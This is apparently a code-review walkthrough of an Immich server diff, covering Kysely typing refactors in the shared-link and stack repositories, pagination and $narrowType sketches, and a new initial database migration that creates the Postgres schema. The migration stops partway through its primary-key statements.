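searchMetadata and searchSmart share a pagination idiom that survives this diff unchanged and is easy to miss in the noise: query `LIMIT size + 1`, treat an overflow row as proof of a next page, then trim it off. Isolated as a sketch:

// Probe-based pagination: the caller asked for `size` items but the query
// fetched size + 1; an extra row means another page exists, and splice()
// drops the probe row before the result is returned.
function toPage<T>(rows: T[], size: number): { items: T[]; hasNextPage: boolean } {
  const hasNextPage = rows.length > size;
  rows.splice(size);
  return { items: rows, hasNextPage };
}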
@@ -1,12 +1,12 @@
 import { Injectable } from '@nestjs/common';
-import { Insertable, Kysely, sql, Updateable } from 'kysely';
+import { Insertable, Kysely, NotNull, sql, Updateable } from 'kysely';
 import { jsonObjectFrom } from 'kysely/helpers/postgres';
 import _ from 'lodash';
 import { InjectKysely } from 'nestjs-kysely';
-import { columns } from 'src/database';
+import { Album, columns } from 'src/database';
 import { DB, SharedLinks } from 'src/db';
 import { DummyValue, GenerateSql } from 'src/decorators';
-import { SharedLinkEntity } from 'src/entities/shared-link.entity';
+import { MapAsset } from 'src/dtos/asset-response.dto';
 import { SharedLinkType } from 'src/enum';
 
 export type SharedLinkSearchOptions = {
@@ -19,7 +19,7 @@ export class SharedLinkRepository {
   constructor(@InjectKysely() private db: Kysely<DB>) {}
 
   @GenerateSql({ params: [DummyValue.UUID, DummyValue.UUID] })
-  get(userId: string, id: string): Promise<SharedLinkEntity | undefined> {
+  get(userId: string, id: string) {
     return this.db
       .selectFrom('shared_links')
       .selectAll('shared_links')
@@ -87,18 +87,23 @@ export class SharedLinkRepository {
             .as('album'),
         (join) => join.onTrue(),
       )
-      .select((eb) => eb.fn.coalesce(eb.fn.jsonAgg('a').filterWhere('a.id', 'is not', null), sql`'[]'`).as('assets'))
+      .select((eb) =>
+        eb.fn
+          .coalesce(eb.fn.jsonAgg('a').filterWhere('a.id', 'is not', null), sql`'[]'`)
+          .$castTo<MapAsset[]>()
+          .as('assets'),
+      )
       .groupBy(['shared_links.id', sql`"album".*`])
-      .select((eb) => eb.fn.toJson('album').as('album'))
+      .select((eb) => eb.fn.toJson('album').$castTo<Album | null>().as('album'))
       .where('shared_links.id', '=', id)
       .where('shared_links.userId', '=', userId)
       .where((eb) => eb.or([eb('shared_links.type', '=', SharedLinkType.INDIVIDUAL), eb('album.id', 'is not', null)]))
       .orderBy('shared_links.createdAt', 'desc')
-      .executeTakeFirst() as Promise<SharedLinkEntity | undefined>;
+      .executeTakeFirst();
   }
 
   @GenerateSql({ params: [{ userId: DummyValue.UUID, albumId: DummyValue.UUID }] })
-  getAll({ userId, albumId }: SharedLinkSearchOptions): Promise<SharedLinkEntity[]> {
+  getAll({ userId, albumId }: SharedLinkSearchOptions) {
     return this.db
       .selectFrom('shared_links')
       .selectAll('shared_links')
@@ -115,6 +120,7 @@ export class SharedLinkRepository {
         (join) => join.onTrue(),
       )
       .select('assets.assets')
+      .$narrowType<{ assets: NotNull }>()
      .leftJoinLateral(
         (eb) =>
           eb
@@ -152,12 +158,12 @@ export class SharedLinkRepository {
             .as('album'),
         (join) => join.onTrue(),
       )
-      .select((eb) => eb.fn.toJson('album').as('album'))
+      .select((eb) => eb.fn.toJson('album').$castTo<Album | null>().as('album'))
       .where((eb) => eb.or([eb('shared_links.type', '=', SharedLinkType.INDIVIDUAL), eb('album.id', 'is not', null)]))
       .$if(!!albumId, (eb) => eb.where('shared_links.albumId', '=', albumId!))
       .orderBy('shared_links.createdAt', 'desc')
       .distinctOn(['shared_links.createdAt'])
-      .execute() as unknown as Promise<SharedLinkEntity[]>;
+      .execute();
   }
 
   @GenerateSql({ params: [DummyValue.BUFFER] })
@@ -177,7 +183,7 @@ export class SharedLinkRepository {
       .executeTakeFirst();
   }
 
-  async create(entity: Insertable<SharedLinks> & { assetIds?: string[] }): Promise<SharedLinkEntity> {
+  async create(entity: Insertable<SharedLinks> & { assetIds?: string[] }) {
     const { id } = await this.db
       .insertInto('shared_links')
       .values(_.omit(entity, 'assetIds'))
@@ -194,7 +200,7 @@ export class SharedLinkRepository {
     return this.getSharedLinks(id);
   }
 
-  async update(entity: Updateable<SharedLinks> & { id: string; assetIds?: string[] }): Promise<SharedLinkEntity> {
+  async update(entity: Updateable<SharedLinks> & { id: string; assetIds?: string[] }) {
     const { id } = await this.db
       .updateTable('shared_links')
       .set(_.omit(entity, 'assets', 'album', 'assetIds'))
@@ -212,8 +218,8 @@ export class SharedLinkRepository {
     return this.getSharedLinks(id);
   }
 
-  async remove(entity: SharedLinkEntity): Promise<void> {
-    await this.db.deleteFrom('shared_links').where('shared_links.id', '=', entity.id).execute();
+  async remove(id: string): Promise<void> {
+    await this.db.deleteFrom('shared_links').where('shared_links.id', '=', id).execute();
   }
 
   private getSharedLinks(id: string) {
@@ -236,9 +242,12 @@ export class SharedLinkRepository {
         (join) => join.onTrue(),
       )
       .select((eb) =>
-        eb.fn.coalesce(eb.fn.jsonAgg('assets').filterWhere('assets.id', 'is not', null), sql`'[]'`).as('assets'),
+        eb.fn
+          .coalesce(eb.fn.jsonAgg('assets').filterWhere('assets.id', 'is not', null), sql`'[]'`)
+          .$castTo<MapAsset[]>()
+          .as('assets'),
       )
       .groupBy('shared_links.id')
-      .executeTakeFirstOrThrow() as Promise<SharedLinkEntity>;
+      .executeTakeFirstOrThrow();
   }
 }
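`$narrowType<{ assets: NotNull }>()` is the compile-time counterpart of the lateral join that always produces an `assets` array: it narrows the inferred column type with no runtime cast. A self-contained sketch on a hypothetical `users` table:

import { Kysely, NotNull } from 'kysely';

interface DB { users: { id: string; nickname: string | null } }

declare const db: Kysely<DB>;

async function usersWithNicknames() {
  return db
    .selectFrom('users')
    .select(['id', 'nickname'])
    .where('nickname', 'is not', null)
    // The filter guarantees nickname is set; $narrowType records that for
    // the type checker, turning `string | null` into `string` in the rows.
    .$narrowType<{ nickname: NotNull }>()
    .execute();
}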
@@ -5,7 +5,6 @@ import { InjectKysely } from 'nestjs-kysely';
 import { columns } from 'src/database';
 import { AssetStack, DB } from 'src/db';
 import { DummyValue, GenerateSql } from 'src/decorators';
-import { AssetEntity } from 'src/entities/asset.entity';
 import { asUuid } from 'src/utils/database';
 
 export interface StackSearch {
@@ -36,9 +35,7 @@ const withAssets = (eb: ExpressionBuilder<DB, 'asset_stack'>, withTags = false)
       .select((eb) => eb.fn.toJson('exifInfo').as('exifInfo'))
       .where('assets.deletedAt', 'is', null)
       .whereRef('assets.stackId', '=', 'asset_stack.id'),
-  )
-    .$castTo<AssetEntity[]>()
-    .as('assets');
+  ).as('assets');
 };
 
 @Injectable()
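With `$castTo<AssetEntity[]>()` gone, `withAssets` leans on the subquery's own inferred row type. The hunk only shows its tail, so this is a guess at the overall shape, using Kysely's `jsonArrayFrom` helper and hypothetical `stacks`/`photos` tables:

import { Kysely } from 'kysely';
import { jsonArrayFrom } from 'kysely/helpers/postgres';

interface DB {
  stacks: { id: string };
  photos: { id: string; stackId: string | null; deletedAt: Date | null };
}

declare const db: Kysely<DB>;

async function stacksWithAssets() {
  return db
    .selectFrom('stacks')
    .select(['stacks.id'])
    .select((eb) =>
      jsonArrayFrom(
        eb
          .selectFrom('photos')
          .selectAll('photos')
          .whereRef('photos.stackId', '=', 'stacks.id')
          .where('photos.deletedAt', 'is', null),
      ).as('assets'), // inferred as an array of photo rows; no entity cast needed
    )
    .execute();
}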
@@ -2,8 +2,7 @@ import { Kysely } from 'kysely';
 import { InjectKysely } from 'nestjs-kysely';
 import { DB } from 'src/db';
 import { DummyValue, GenerateSql } from 'src/decorators';
-import { withExif } from 'src/entities/asset.entity';
-import { asUuid } from 'src/utils/database';
+import { asUuid, withExif } from 'src/utils/database';
 
 export class ViewRepository {
   constructor(@InjectKysely() private db: Kysely<DB>) {}
410
server/src/schema/migrations/1744910873969-InitialMigration.ts
Normal file
@@ -0,0 +1,410 @@
+import { Kysely, sql } from 'kysely';
+import { DatabaseExtension } from 'src/enum';
+import { ConfigRepository } from 'src/repositories/config.repository';
+import { LoggingRepository } from 'src/repositories/logging.repository';
+
+const vectorExtension = new ConfigRepository().getEnv().database.vectorExtension;
+const lastMigrationSql = sql<{ name: string }>`SELECT "name" FROM "migrations" ORDER BY "timestamp" DESC LIMIT 1;`;
+const tableExists = sql<{ result: string | null }>`select to_regclass('migrations') as "result"`;
+const logger = LoggingRepository.create();
+
+export async function up(db: Kysely<any>): Promise<void> {
+  const { rows } = await tableExists.execute(db);
+  const hasTypeOrmMigrations = !!rows[0]?.result;
+  if (hasTypeOrmMigrations) {
+    const {
+      rows: [lastMigration],
+    } = await lastMigrationSql.execute(db);
+    if (lastMigration?.name !== 'AddMissingIndex1744910873956') {
+      throw new Error(
+        'Invalid upgrade path. For more information, see https://immich.app/errors#typeorm-upgrade',
+      );
+    }
+    logger.log('Database has up to date TypeORM migrations, skipping initial Kysely migration');
+    return;
+  }
+
+  await sql`CREATE EXTENSION IF NOT EXISTS "uuid-ossp";`.execute(db);
+  await sql`CREATE EXTENSION IF NOT EXISTS "unaccent";`.execute(db);
+  await sql`CREATE EXTENSION IF NOT EXISTS "cube";`.execute(db);
+  await sql`CREATE EXTENSION IF NOT EXISTS "earthdistance";`.execute(db);
+  await sql`CREATE EXTENSION IF NOT EXISTS "pg_trgm";`.execute(db);
+  await sql`CREATE EXTENSION IF NOT EXISTS "vectors";`.execute(db);
+  await sql`CREATE OR REPLACE FUNCTION immich_uuid_v7(p_timestamp timestamp with time zone default clock_timestamp())
+  RETURNS uuid
+  VOLATILE LANGUAGE SQL
+  AS $$
+    select encode(
+      set_bit(
+        set_bit(
+          overlay(uuid_send(gen_random_uuid())
+            placing substring(int8send(floor(extract(epoch from p_timestamp) * 1000)::bigint) from 3)
+            from 1 for 6
+          ),
+          52, 1
+        ),
+        53, 1
+      ),
+      'hex')::uuid;
+  $$;`.execute(db);
+  await sql`CREATE OR REPLACE FUNCTION updated_at()
+  RETURNS TRIGGER
+  LANGUAGE PLPGSQL
+  AS $$
+    DECLARE
+      clock_timestamp TIMESTAMP := clock_timestamp();
+    BEGIN
+      new."updatedAt" = clock_timestamp;
+      new."updateId" = immich_uuid_v7(clock_timestamp);
+      return new;
+    END;
+  $$;`.execute(db);
+  await sql`CREATE OR REPLACE FUNCTION f_concat_ws(text, text[])
+  RETURNS text
+  PARALLEL SAFE IMMUTABLE LANGUAGE SQL
+  AS $$SELECT array_to_string($2, $1)$$;`.execute(db);
+  await sql`CREATE OR REPLACE FUNCTION f_unaccent(text)
+  RETURNS text
+  PARALLEL SAFE STRICT IMMUTABLE LANGUAGE SQL
+  RETURN unaccent('unaccent', $1)`.execute(db);
+  await sql`CREATE OR REPLACE FUNCTION ll_to_earth_public(latitude double precision, longitude double precision)
+  RETURNS public.earth
+  PARALLEL SAFE STRICT IMMUTABLE LANGUAGE SQL
+  AS $$
+    SELECT public.cube(public.cube(public.cube(public.earth()*cos(radians(latitude))*cos(radians(longitude))),public.earth()*cos(radians(latitude))*sin(radians(longitude))),public.earth()*sin(radians(latitude)))::public.earth
+  $$;`.execute(db);
+  await sql`CREATE OR REPLACE FUNCTION users_delete_audit()
+  RETURNS TRIGGER
+  LANGUAGE PLPGSQL
+  AS $$
+    BEGIN
+      INSERT INTO users_audit ("userId")
+      SELECT "id"
+      FROM OLD;
+      RETURN NULL;
+    END;
+  $$;`.execute(db);
+  await sql`CREATE OR REPLACE FUNCTION partners_delete_audit()
+  RETURNS TRIGGER
+  LANGUAGE PLPGSQL
+  AS $$
+    BEGIN
+      INSERT INTO partners_audit ("sharedById", "sharedWithId")
+      SELECT "sharedById", "sharedWithId"
+      FROM OLD;
+      RETURN NULL;
+    END;
+  $$;`.execute(db);
+  await sql`CREATE OR REPLACE FUNCTION assets_delete_audit()
+  RETURNS TRIGGER
+  LANGUAGE PLPGSQL
+  AS $$
+    BEGIN
+      INSERT INTO assets_audit ("assetId", "ownerId")
+      SELECT "id", "ownerId"
+      FROM OLD;
+      RETURN NULL;
+    END;
+  $$;`.execute(db);
+  if (vectorExtension === DatabaseExtension.VECTORS) {
+    await sql`SET search_path TO "$user", public, vectors`.execute(db);
+    await sql`SET vectors.pgvector_compatibility=on`.execute(db);
+  }
+  await sql`CREATE TYPE "assets_status_enum" AS ENUM ('active','trashed','deleted');`.execute(db);
+  await sql`CREATE TYPE "sourcetype" AS ENUM ('machine-learning','exif','manual');`.execute(db);
+  await sql`CREATE TABLE "users" ("id" uuid NOT NULL DEFAULT uuid_generate_v4(), "email" character varying NOT NULL, "password" character varying NOT NULL DEFAULT '', "createdAt" timestamp with time zone NOT NULL DEFAULT now(), "profileImagePath" character varying NOT NULL DEFAULT '', "isAdmin" boolean NOT NULL DEFAULT false, "shouldChangePassword" boolean NOT NULL DEFAULT true, "deletedAt" timestamp with time zone, "oauthId" character varying NOT NULL DEFAULT '', "updatedAt" timestamp with time zone NOT NULL DEFAULT now(), "storageLabel" character varying, "name" character varying NOT NULL DEFAULT '', "quotaSizeInBytes" bigint, "quotaUsageInBytes" bigint NOT NULL DEFAULT 0, "status" character varying NOT NULL DEFAULT 'active', "profileChangedAt" timestamp with time zone NOT NULL DEFAULT now(), "updateId" uuid NOT NULL DEFAULT immich_uuid_v7());`.execute(db);
+  await sql`CREATE TABLE "libraries" ("id" uuid NOT NULL DEFAULT uuid_generate_v4(), "name" character varying NOT NULL, "ownerId" uuid NOT NULL, "importPaths" text[] NOT NULL, "exclusionPatterns" text[] NOT NULL, "createdAt" timestamp with time zone NOT NULL DEFAULT now(), "updatedAt" timestamp with time zone NOT NULL DEFAULT now(), "deletedAt" timestamp with time zone, "refreshedAt" timestamp with time zone, "updateId" uuid NOT NULL DEFAULT immich_uuid_v7());`.execute(db);
+  await sql`CREATE TABLE "asset_stack" ("id" uuid NOT NULL DEFAULT uuid_generate_v4(), "primaryAssetId" uuid NOT NULL, "ownerId" uuid NOT NULL);`.execute(db);
+  await sql`CREATE TABLE "assets" ("id" uuid NOT NULL DEFAULT uuid_generate_v4(), "deviceAssetId" character varying NOT NULL, "ownerId" uuid NOT NULL, "deviceId" character varying NOT NULL, "type" character varying NOT NULL, "originalPath" character varying NOT NULL, "fileCreatedAt" timestamp with time zone NOT NULL, "fileModifiedAt" timestamp with time zone NOT NULL, "isFavorite" boolean NOT NULL DEFAULT false, "duration" character varying, "encodedVideoPath" character varying DEFAULT '', "checksum" bytea NOT NULL, "isVisible" boolean NOT NULL DEFAULT true, "livePhotoVideoId" uuid, "updatedAt" timestamp with time zone NOT NULL DEFAULT now(), "createdAt" timestamp with time zone NOT NULL DEFAULT now(), "isArchived" boolean NOT NULL DEFAULT false, "originalFileName" character varying NOT NULL, "sidecarPath" character varying, "thumbhash" bytea, "isOffline" boolean NOT NULL DEFAULT false, "libraryId" uuid, "isExternal" boolean NOT NULL DEFAULT false, "deletedAt" timestamp with time zone, "localDateTime" timestamp with time zone NOT NULL, "stackId" uuid, "duplicateId" uuid, "status" assets_status_enum NOT NULL DEFAULT 'active', "updateId" uuid NOT NULL DEFAULT immich_uuid_v7());`.execute(db);
+  await sql`CREATE TABLE "albums" ("id" uuid NOT NULL DEFAULT uuid_generate_v4(), "ownerId" uuid NOT NULL, "albumName" character varying NOT NULL DEFAULT 'Untitled Album', "createdAt" timestamp with time zone NOT NULL DEFAULT now(), "albumThumbnailAssetId" uuid, "updatedAt" timestamp with time zone NOT NULL DEFAULT now(), "description" text NOT NULL DEFAULT '', "deletedAt" timestamp with time zone, "isActivityEnabled" boolean NOT NULL DEFAULT true, "order" character varying NOT NULL DEFAULT 'desc', "updateId" uuid NOT NULL DEFAULT immich_uuid_v7());`.execute(db);
+  await sql`COMMENT ON COLUMN "albums"."albumThumbnailAssetId" IS 'Asset ID to be used as thumbnail';`.execute(db);
+  await sql`CREATE TABLE "activity" ("id" uuid NOT NULL DEFAULT uuid_generate_v4(), "createdAt" timestamp with time zone NOT NULL DEFAULT now(), "updatedAt" timestamp with time zone NOT NULL DEFAULT now(), "albumId" uuid NOT NULL, "userId" uuid NOT NULL, "assetId" uuid, "comment" text, "isLiked" boolean NOT NULL DEFAULT false, "updateId" uuid NOT NULL DEFAULT immich_uuid_v7());`.execute(db);
+  await sql`CREATE TABLE "albums_assets_assets" ("albumsId" uuid NOT NULL, "assetsId" uuid NOT NULL, "createdAt" timestamp with time zone NOT NULL DEFAULT now());`.execute(db);
+  await sql`CREATE TABLE "albums_shared_users_users" ("albumsId" uuid NOT NULL, "usersId" uuid NOT NULL, "role" character varying NOT NULL DEFAULT 'editor');`.execute(db);
+  await sql`CREATE TABLE "api_keys" ("name" character varying NOT NULL, "key" character varying NOT NULL, "userId" uuid NOT NULL, "createdAt" timestamp with time zone NOT NULL DEFAULT now(), "updatedAt" timestamp with time zone NOT NULL DEFAULT now(), "id" uuid NOT NULL DEFAULT uuid_generate_v4(), "permissions" character varying[] NOT NULL, "updateId" uuid NOT NULL DEFAULT immich_uuid_v7());`.execute(db);
+  await sql`CREATE TABLE "assets_audit" ("id" uuid NOT NULL DEFAULT immich_uuid_v7(), "assetId" uuid NOT NULL, "ownerId" uuid NOT NULL, "deletedAt" timestamp with time zone NOT NULL DEFAULT clock_timestamp());`.execute(db);
+  await sql`CREATE TABLE "person" ("id" uuid NOT NULL DEFAULT uuid_generate_v4(), "createdAt" timestamp with time zone NOT NULL DEFAULT now(), "updatedAt" timestamp with time zone NOT NULL DEFAULT now(), "ownerId" uuid NOT NULL, "name" character varying NOT NULL DEFAULT '', "thumbnailPath" character varying NOT NULL DEFAULT '', "isHidden" boolean NOT NULL DEFAULT false, "birthDate" date, "faceAssetId" uuid, "isFavorite" boolean NOT NULL DEFAULT false, "color" character varying, "updateId" uuid NOT NULL DEFAULT immich_uuid_v7());`.execute(db);
+  await sql`CREATE TABLE "asset_faces" ("assetId" uuid NOT NULL, "personId" uuid, "imageWidth" integer NOT NULL DEFAULT 0, "imageHeight" integer NOT NULL DEFAULT 0, "boundingBoxX1" integer NOT NULL DEFAULT 0, "boundingBoxY1" integer NOT NULL DEFAULT 0, "boundingBoxX2" integer NOT NULL DEFAULT 0, "boundingBoxY2" integer NOT NULL DEFAULT 0, "id" uuid NOT NULL DEFAULT uuid_generate_v4(), "sourceType" sourcetype NOT NULL DEFAULT 'machine-learning', "deletedAt" timestamp with time zone);`.execute(db);
+  await sql`CREATE TABLE "asset_files" ("id" uuid NOT NULL DEFAULT uuid_generate_v4(), "assetId" uuid NOT NULL, "createdAt" timestamp with time zone NOT NULL DEFAULT now(), "updatedAt" timestamp with time zone NOT NULL DEFAULT now(), "type" character varying NOT NULL, "path" character varying NOT NULL, "updateId" uuid NOT NULL DEFAULT immich_uuid_v7());`.execute(db);
+  await sql`CREATE TABLE "asset_job_status" ("assetId" uuid NOT NULL, "facesRecognizedAt" timestamp with time zone, "metadataExtractedAt" timestamp with time zone, "duplicatesDetectedAt" timestamp with time zone, "previewAt" timestamp with time zone, "thumbnailAt" timestamp with time zone);`.execute(db);
+  await sql`CREATE TABLE "audit" ("id" serial NOT NULL, "entityType" character varying NOT NULL, "entityId" uuid NOT NULL, "action" character varying NOT NULL, "ownerId" uuid NOT NULL, "createdAt" timestamp with time zone NOT NULL DEFAULT now());`.execute(db);
+  await sql`CREATE TABLE "exif" ("assetId" uuid NOT NULL, "make" character varying, "model" character varying, "exifImageWidth" integer, "exifImageHeight" integer, "fileSizeInByte" bigint, "orientation" character varying, "dateTimeOriginal" timestamp with time zone, "modifyDate" timestamp with time zone, "lensModel" character varying, "fNumber" double precision, "focalLength" double precision, "iso" integer, "latitude" double precision, "longitude" double precision, "city" character varying, "state" character varying, "country" character varying, "description" text NOT NULL DEFAULT '', "fps" double precision, "exposureTime" character varying, "livePhotoCID" character varying, "timeZone" character varying, "projectionType" character varying, "profileDescription" character varying, "colorspace" character varying, "bitsPerSample" integer, "autoStackId" character varying, "rating" integer, "updatedAt" timestamp with time zone NOT NULL DEFAULT clock_timestamp(), "updateId" uuid NOT NULL DEFAULT immich_uuid_v7());`.execute(db);
+  await sql`CREATE TABLE "face_search" ("faceId" uuid NOT NULL, "embedding" vector(512) NOT NULL);`.execute(db);
+  await sql`CREATE TABLE "geodata_places" ("id" integer NOT NULL, "name" character varying(200) NOT NULL, "longitude" double precision NOT NULL, "latitude" double precision NOT NULL, "countryCode" character(2) NOT NULL, "admin1Code" character varying(20), "admin2Code" character varying(80), "modificationDate" date NOT NULL, "admin1Name" character varying, "admin2Name" character varying, "alternateNames" character varying);`.execute(db);
+  await sql`CREATE TABLE "memories" ("id" uuid NOT NULL DEFAULT uuid_generate_v4(), "createdAt" timestamp with time zone NOT NULL DEFAULT now(), "updatedAt" timestamp with time zone NOT NULL DEFAULT now(), "deletedAt" timestamp with time zone, "ownerId" uuid NOT NULL, "type" character varying NOT NULL, "data" jsonb NOT NULL, "isSaved" boolean NOT NULL DEFAULT false, "memoryAt" timestamp with time zone NOT NULL, "seenAt" timestamp with time zone, "showAt" timestamp with time zone, "hideAt" timestamp with time zone, "updateId" uuid NOT NULL DEFAULT immich_uuid_v7());`.execute(db);
+  await sql`CREATE TABLE "memories_assets_assets" ("memoriesId" uuid NOT NULL, "assetsId" uuid NOT NULL);`.execute(db);
+  await sql`CREATE TABLE "move_history" ("id" uuid NOT NULL DEFAULT uuid_generate_v4(), "entityId" uuid NOT NULL, "pathType" character varying NOT NULL, "oldPath" character varying NOT NULL, "newPath" character varying NOT NULL);`.execute(db);
+  await sql`CREATE TABLE "naturalearth_countries" ("id" integer NOT NULL GENERATED ALWAYS AS IDENTITY, "admin" character varying(50) NOT NULL, "admin_a3" character varying(3) NOT NULL, "type" character varying(50) NOT NULL, "coordinates" polygon NOT NULL);`.execute(db);
+  await sql`CREATE TABLE "partners_audit" ("id" uuid NOT NULL DEFAULT immich_uuid_v7(), "sharedById" uuid NOT NULL, "sharedWithId" uuid NOT NULL, "deletedAt" timestamp with time zone NOT NULL DEFAULT clock_timestamp());`.execute(db);
+  await sql`CREATE TABLE "partners" ("sharedById" uuid NOT NULL, "sharedWithId" uuid NOT NULL, "createdAt" timestamp with time zone NOT NULL DEFAULT now(), "updatedAt" timestamp with time zone NOT NULL DEFAULT now(), "inTimeline" boolean NOT NULL DEFAULT false, "updateId" uuid NOT NULL DEFAULT immich_uuid_v7());`.execute(db);
+  await sql`CREATE TABLE "sessions" ("id" uuid NOT NULL DEFAULT uuid_generate_v4(), "token" character varying NOT NULL, "createdAt" timestamp with time zone NOT NULL DEFAULT now(), "updatedAt" timestamp with time zone NOT NULL DEFAULT now(), "userId" uuid NOT NULL, "deviceType" character varying NOT NULL DEFAULT '', "deviceOS" character varying NOT NULL DEFAULT '', "updateId" uuid NOT NULL DEFAULT immich_uuid_v7());`.execute(db);
+  await sql`CREATE TABLE "shared_links" ("id" uuid NOT NULL DEFAULT uuid_generate_v4(), "description" character varying, "userId" uuid NOT NULL, "key" bytea NOT NULL, "type" character varying NOT NULL, "createdAt" timestamp with time zone NOT NULL DEFAULT now(), "expiresAt" timestamp with time zone, "allowUpload" boolean NOT NULL DEFAULT false, "albumId" uuid, "allowDownload" boolean NOT NULL DEFAULT true, "showExif" boolean NOT NULL DEFAULT true, "password" character varying);`.execute(db);
+  await sql`CREATE TABLE "shared_link__asset" ("assetsId" uuid NOT NULL, "sharedLinksId" uuid NOT NULL);`.execute(db);
+  await sql`CREATE TABLE "smart_search" ("assetId" uuid NOT NULL, "embedding" vector(512) NOT NULL);`.execute(db);
+  await sql`ALTER TABLE "smart_search" ALTER COLUMN "embedding" SET STORAGE EXTERNAL;`.execute(db);
+  await sql`CREATE TABLE "session_sync_checkpoints" ("sessionId" uuid NOT NULL, "type" character varying NOT NULL, "createdAt" timestamp with time zone NOT NULL DEFAULT now(), "updatedAt" timestamp with time zone NOT NULL DEFAULT now(), "ack" character varying NOT NULL, "updateId" uuid NOT NULL DEFAULT immich_uuid_v7());`.execute(db);
+  await sql`CREATE TABLE "system_metadata" ("key" character varying NOT NULL, "value" jsonb NOT NULL);`.execute(db);
+  await sql`CREATE TABLE "tags" ("id" uuid NOT NULL DEFAULT uuid_generate_v4(), "userId" uuid NOT NULL, "value" character varying NOT NULL, "createdAt" timestamp with time zone NOT NULL DEFAULT now(), "updatedAt" timestamp with time zone NOT NULL DEFAULT now(), "color" character varying, "parentId" uuid, "updateId" uuid NOT NULL DEFAULT immich_uuid_v7());`.execute(db);
+  await sql`CREATE TABLE "tag_asset" ("assetsId" uuid NOT NULL, "tagsId" uuid NOT NULL);`.execute(db);
+  await sql`CREATE TABLE "tags_closure" ("id_ancestor" uuid NOT NULL, "id_descendant" uuid NOT NULL);`.execute(db);
+  await sql`CREATE TABLE "users_audit" ("userId" uuid NOT NULL, "deletedAt" timestamp with time zone NOT NULL DEFAULT clock_timestamp(), "id" uuid NOT NULL DEFAULT immich_uuid_v7());`.execute(db);
+  await sql`CREATE TABLE "user_metadata" ("userId" uuid NOT NULL, "key" character varying NOT NULL, "value" jsonb NOT NULL);`.execute(db);
+  await sql`CREATE TABLE "version_history" ("id" uuid NOT NULL DEFAULT uuid_generate_v4(), "createdAt" timestamp with time zone NOT NULL DEFAULT now(), "version" character varying NOT NULL);`.execute(db);
+  await sql`ALTER TABLE "users" ADD CONSTRAINT "PK_a3ffb1c0c8416b9fc6f907b7433" PRIMARY KEY ("id");`.execute(db);
+  await sql`ALTER TABLE "libraries" ADD CONSTRAINT "PK_505fedfcad00a09b3734b4223de" PRIMARY KEY ("id");`.execute(db);
+  await sql`ALTER TABLE "asset_stack" ADD CONSTRAINT "PK_74a27e7fcbd5852463d0af3034b" PRIMARY KEY ("id");`.execute(db);
+  await sql`ALTER TABLE "assets" ADD CONSTRAINT "PK_da96729a8b113377cfb6a62439c" PRIMARY KEY ("id");`.execute(db);
+  await sql`ALTER TABLE "albums" ADD CONSTRAINT "PK_7f71c7b5bc7c87b8f94c9a93a00" PRIMARY KEY ("id");`.execute(db);
+  await sql`ALTER TABLE "activity" ADD CONSTRAINT "PK_24625a1d6b1b089c8ae206fe467" PRIMARY KEY ("id");`.execute(db);
+  await sql`ALTER TABLE "albums_assets_assets" ADD CONSTRAINT "PK_c67bc36fa845fb7b18e0e398180" PRIMARY KEY ("albumsId", "assetsId");`.execute(db);
+  await sql`ALTER TABLE "albums_shared_users_users" ADD CONSTRAINT "PK_7df55657e0b2e8b626330a0ebc8" PRIMARY KEY ("albumsId", "usersId");`.execute(db);
+  await sql`ALTER TABLE "api_keys" ADD CONSTRAINT "PK_5c8a79801b44bd27b79228e1dad" PRIMARY KEY ("id");`.execute(db);
+  await sql`ALTER TABLE "assets_audit" ADD CONSTRAINT "PK_99bd5c015f81a641927a32b4212" PRIMARY KEY ("id");`.execute(db);
+  await sql`ALTER TABLE "person" ADD CONSTRAINT "PK_5fdaf670315c4b7e70cce85daa3" PRIMARY KEY ("id");`.execute(db);
+  await sql`ALTER TABLE "asset_faces" ADD CONSTRAINT "PK_6df76ab2eb6f5b57b7c2f1fc684" PRIMARY KEY ("id");`.execute(db);
+  await sql`ALTER TABLE "asset_files" ADD CONSTRAINT "PK_c41dc3e9ef5e1c57ca5a08a0004" PRIMARY KEY ("id");`.execute(db);
+  await sql`ALTER TABLE "asset_job_status" ADD CONSTRAINT "PK_420bec36fc02813bddf5c8b73d4" PRIMARY KEY ("assetId");`.execute(db);
+  await sql`ALTER TABLE "audit" ADD CONSTRAINT "PK_1d3d120ddaf7bc9b1ed68ed463a" PRIMARY KEY ("id");`.execute(db);
+  await sql`ALTER TABLE "exif" ADD CONSTRAINT "PK_c0117fdbc50b917ef9067740c44" PRIMARY KEY ("assetId");`.execute(db);
+  await sql`ALTER TABLE "face_search" ADD CONSTRAINT "face_search_pkey" PRIMARY KEY ("faceId");`.execute(db);
+  await sql`ALTER TABLE "geodata_places" ADD CONSTRAINT "PK_c29918988912ef4036f3d7fbff4" PRIMARY KEY ("id");`.execute(db);
+  await sql`ALTER TABLE "memories" ADD CONSTRAINT "PK_aaa0692d9496fe827b0568612f8" PRIMARY KEY ("id");`.execute(db);
+  await sql`ALTER TABLE "memories_assets_assets" ADD CONSTRAINT "PK_fcaf7112a013d1703c011c6793d" PRIMARY KEY ("memoriesId", "assetsId");`.execute(db);
+  await sql`ALTER TABLE "move_history" ADD CONSTRAINT "PK_af608f132233acf123f2949678d" PRIMARY KEY ("id");`.execute(db);
+  await sql`ALTER TABLE "naturalearth_countries" ADD CONSTRAINT "PK_21a6d86d1ab5d841648212e5353" PRIMARY KEY ("id");`.execute(db);
+  await sql`ALTER TABLE "partners_audit" ADD CONSTRAINT "PK_952b50217ff78198a7e380f0359" PRIMARY KEY ("id");`.execute(db);
+  await sql`ALTER TABLE "partners" ADD CONSTRAINT "PK_f1cc8f73d16b367f426261a8736" PRIMARY KEY ("sharedById", "sharedWithId");`.execute(db);
+  await sql`ALTER TABLE "sessions" ADD CONSTRAINT "PK_48cb6b5c20faa63157b3c1baf7f" PRIMARY KEY ("id");`.execute(db);
+  await sql`ALTER TABLE "shared_links" ADD CONSTRAINT "PK_642e2b0f619e4876e5f90a43465" PRIMARY KEY ("id");`.execute(db);
+  await sql`ALTER TABLE "shared_link__asset" ADD CONSTRAINT "PK_9b4f3687f9b31d1e311336b05e3" PRIMARY KEY ("assetsId", "sharedLinksId");`.execute(db);
+  await sql`ALTER TABLE "smart_search" ADD CONSTRAINT "smart_search_pkey" PRIMARY KEY ("assetId");`.execute(db);
+  await sql`ALTER TABLE "session_sync_checkpoints" ADD CONSTRAINT "PK_b846ab547a702863ef7cd9412fb" PRIMARY KEY ("sessionId", "type");`.execute(db);
+  await sql`ALTER TABLE "system_metadata" ADD CONSTRAINT "PK_fa94f6857470fb5b81ec6084465" PRIMARY KEY ("key");`.execute(db);
